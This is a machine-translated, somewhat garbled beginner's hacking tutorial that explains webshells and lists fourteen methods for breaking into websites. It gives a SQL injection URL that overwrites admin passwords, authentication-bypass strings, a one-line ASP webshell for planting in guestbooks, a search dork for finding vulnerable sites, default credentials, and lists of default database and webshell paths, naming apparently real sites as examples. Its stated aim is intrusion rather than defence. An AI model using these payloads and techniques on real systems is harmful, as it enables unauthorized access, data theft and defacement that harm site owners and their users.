Very good summary of BASIC script intrusion knowledge page 1/2

1. What is webshell? This is a problem many friends are wondering about,
What is webshell? Let's talk about this topic today!

Webshell is a Web intrusion script attack tool.

To put it simply, webshell is an ASP or PHP Trojan backdoor. After hackers intrude into a website, they often place these ASP or PHP Trojan backdoor files in the web directory of the website server, mixed with normal webpage files. Then hackers can use the web method to control the website server through the ASP or PHP Trojan backdoor, including uploading and downloading files, viewing databases, and executing arbitraryProgramCommand. </P>

To better understand webshell, we have learned two concepts:

What is a "Trojan "? Trojan Horse is a trojan horse (Trojan <br> horse). It refers to the story of an ancient Greek soldier hiding in a Trojan horse and entering an enemy city to occupy an enemy city. On the Internet, a "Trojan Horse" refers to an application or game that some programmers can download from the Internet, including programs that can control users' computer systems, it may cause damage or even paralysis of the user's system.

What is a backdoor? As we all know, a computer has 65535 ports. If you think of a computer as a room, the 65535 ports can be regarded as the 65535 door opened by the computer for external connection. Each portal is a service. Some doors are specially opened by the host to greet the guests (provide services), and some are opened by the host to visit the guests (access remote services)-theoretically, the rest of the doors should be closed, but for various reasons, many of them are open. As a result, there was a good opportunity to enter, and the host's privacy was stabbed, and life was disturbed, and even things in the house were made a wolf. This webshell is a webshell ".

Advantages of webshell

The biggest advantage of webshell is that it can pass through the firewall. Because the data exchanged with the controlled server or remote host is transmitted through port 80, it will not be intercepted by the firewall. In addition, webshell generally does not leave a record in the system log, but only leaves some data submission records in the web log of the website. It is difficult for inexperienced administrators to see intrusion traces.

How to find webshel:

1. Script attack SQL Injection <br>

2. Use the injection tool <br>

3. Open Baidu in the browser, enter the search keyword "FSO support is not required for operations on this page &" or "only one operation can be performed at a time", and then click search, you will soon be able to see a large number of query results. <br> I will not talk about other things for the time being. I will go into details later. I need a great deal of perseverance and effort to prepare a topic every day, the daily lectures we hold are intended to popularize information security knowledge, which is easy to understand.ArticlePeople who think that information security knowledge is profound and boring understand that, in fact, they only need to spend a little time to understand a lot of information security knowledge!

Ii. 14 methods available for cainiao to learn intrusion

Author: anonymous author: original site hits: 560 updated on:

1. Upload Vulnerability [not to mention]

PS: If you see: select the file you want to upload [re-upload] or "Please log in and use it", 80% will have a vulnerability!

Sometimes the upload may not be successful, because cookies are different. We need to use wsockexpert to obtain cookies and then use domain to upload them.

2. injection vulnerability [not to mention]

PS: the MD5 password. Sometimes it is not easy to run. If it is a [SQL database], we can use the following command:

Http: // inject URL; update admin SET Password = 'new MD5 password' where Password = 'old MD5 password' -- [admin is the table name.]

3. Bypass, that is, cross-site.

When we intrude into a station, this station may be robust and impeccable. We can find a site with the same server as this station, and then use this Site for Elevation of Privilege, sniffing and other methods to intrude into the websites we want to intrude ., The difficulty here is that the absolute paths of some servers are encrypted, which depends on our skills.

4. brute-force database: replace/in the middle of the second-level directory with % 5c

Ey: http://www.scbzlx.com/test/test/test.asp? Test = Test & test = 1

If you can see that: 'e: \ test \ database \ test. Asa 'is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.

This is the database. When downloading, replace flashget with. mdb Format.

5. 'or' = 'or' is a language that can connect to SQL. You can directly enter the background. I collected it. Similar:

'Or ''='" or "A" = "A') or ('A' = 'a ") or ("A" = "A or 1 = 1 -- 'or 'A' = 'a

6. social engineering. We all know this. Is to guess.

7. Write Data to an ASP database. Is a single-statement Trojan [<% execute request ("value") %>], commonly used in message books.

Ey: http://www.scbzlx.com/book/book.asp?this is an ASP-format data warehouse, and then write it into a Trojan.

8. source code utilization: some websites use the source code downloaded from the Internet. Some webmasters offer a lot of food and don't change anything.

Ey: http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

This site uses the outstanding record. I have downloaded the source code,

Default database/webshell path: \ database \ liangu_data.mdb background management: adm_login.asp password and user name are admin

9. Use of the default database/webshell path: many of these websites/other people's webshells.

/Databackup/dvbbs7.mdb

/BBS/databackup/dvbbs7.mdb

/BBS/data/dvbbs7.mdb

/Data/dvbbs7.mdb

/BBS/DIY. asp

/DIY. asp

/BBS/CMD. asp

/BBS/cmd.exe

/BBS/s-u.exe

/BBS/servu.exe

Tool: web site hunter

Ey: http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB